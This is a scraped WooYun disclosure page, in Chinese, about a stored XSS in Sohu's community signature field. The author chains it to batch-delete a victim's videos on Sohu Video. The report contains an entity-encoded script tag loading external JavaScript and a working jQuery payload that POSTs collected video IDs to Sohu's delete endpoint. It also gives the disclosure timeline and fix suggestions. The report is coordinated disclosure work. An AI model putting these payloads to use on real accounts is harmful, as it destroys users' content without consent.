利用搜狐视频XSS批量删除用户视频 | wooyun-2016-0168610| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168610

漏洞标题：利用搜狐视频XSS批量删除用户视频

漏洞作者： q601333824

提交时间：2016-01-11 12:40

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：XSS 跨站脚本攻击

危害等级：中

自评Rank：9

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-11：细节已通知厂商并且等待厂商处理中
2016-01-11：厂商已经确认，细节仅向厂商公开
2016-01-21：细节向核心白帽子及相关领域专家公开
2016-01-31：细节向普通白帽子公开
2016-02-10：细节向实习白帽子公开
2016-02-22：细节向公众公开

简要描述：

利用搜狐视频XSS批量删除用户视频

详细说明：

1.上次搜狐的邮箱的域已经修改成mail.sohu.com
2.但是搜狐视频的域还是sohu.com,如图

3.其他内容看这个漏洞，然后我从例子开始说

 WooYun: 利用搜狐邮箱XSS劫持用户邮件

4.可以从搜狐社区，获取搜狐视频的内容，如图

---------------------------------------------------------------------------------------
5.上次说的搜狐社区XSS还没有修复,还是能用，能加载外部JS(不要在意状态404，为了演示插入一个没有的页面演示,这样就没危害了)
6.签名档插入代码

<br>&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#32;&#115;&#114;&#99;&#61;&#34;http://q601333824.sinaapp.com/xss1.js&#34;

------------------------------------------------------------------------------------------
7.具体利用方法就是，获取用户视频列表的视频id,然后post请求删除,这个页面可以显示出用户一页视频

http://my.tv.sohu.com/user/video/list.do

8.这一段是我自己写的的JS代码，这个代码只删除一页视频,先获取当前页面所有视频id,然后把视频ID交给post函数循环删除.

var obj=$(".item.cfix");
var changdu=obj.length;
    if(changdu!=0){
	 function post(id){
		 alert(id);
		 $.post("http://my.tv.sohu.com/user/a/wvideo/deletevideos.do",
		 {"vids":id
		 },
		 function(data,stat){
			  if(stat=="success"){
				  alert("删除成功");
			    }else{	
				  alert("删除失败");
				}
			}
			 
	    );
    }
	for(var i=0;i<changdu;i++){
		var id=obj[i].getAttribute("data-vid");		
		post(id);
	}
}else{
	alert("对不起，您没有上传视频");
}

9.至于批量删除，可以实现的，因为一页显示10个视频，计算出总页数，也就是删除次数

删除次数=Math.ceil(总视频数量 / 10)

---------------------------------------------------------------------------------------------
10.下面直接测试图片(这次不要加载w3c菜鸟教程的库了，因为搜狐视频支持post)

①.我把每次获取的视频编号弹出来一次，这是其中一个视频

②.删除成功

③.那么多的post请求，返回删除成功

④.视频列表全没了(这我自己的号，不是别的，别打我)

漏洞证明：

1.漏洞证明看上面
2下面直接测试图片(这次不要加载w3c菜鸟教程的库了，因为搜狐视频支持post)

①.我把每次获取的视频编号弹出来一次，这是其中一个视频

②.删除成功

③.那么多的post请求，返回删除成功

④.视频列表全没了(这我自己的号，不是别的，别打我)

修复方案：

1.可以在网页代码加上这句话

document.domain="tv.sohu.com"

2.也可以试试

x-frame-options

3.补充一下，我测试删的是我视频，没删别人的(=_=)

版权声明：转载请注明来源 q601333824@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-01-11 18:25

厂商回复：

感谢指出问题.我们正在与业务线协商解决方案.

漏洞评价：

评价

2016-01-11 18:44 | q601333824 ( 普通白帽子 | Rank:269 漏洞数:56 | 出自《狐妖小红娘》---自古人妖生死恋，千...)

@搜狐别的站点就不提交了，其他站点的关键操作也看看有没有存在一样的问题....(=_=)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168610

漏洞标题：利用搜狐视频XSS批量删除用户视频

相关厂商：搜狐

漏洞作者： q601333824

提交时间：2016-01-11 12:40

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：XSS 跨站脚本攻击

危害等级：中

自评Rank：9

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 q601333824@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168610

漏洞标题：利用搜狐视频XSS批量删除用户视频

相关厂商：搜狐

漏洞作者： q601333824

提交时间：2016-01-11 12:40

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：XSS 跨站脚本攻击

危害等级：中

自评Rank：9

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0168610"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 q601333824@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：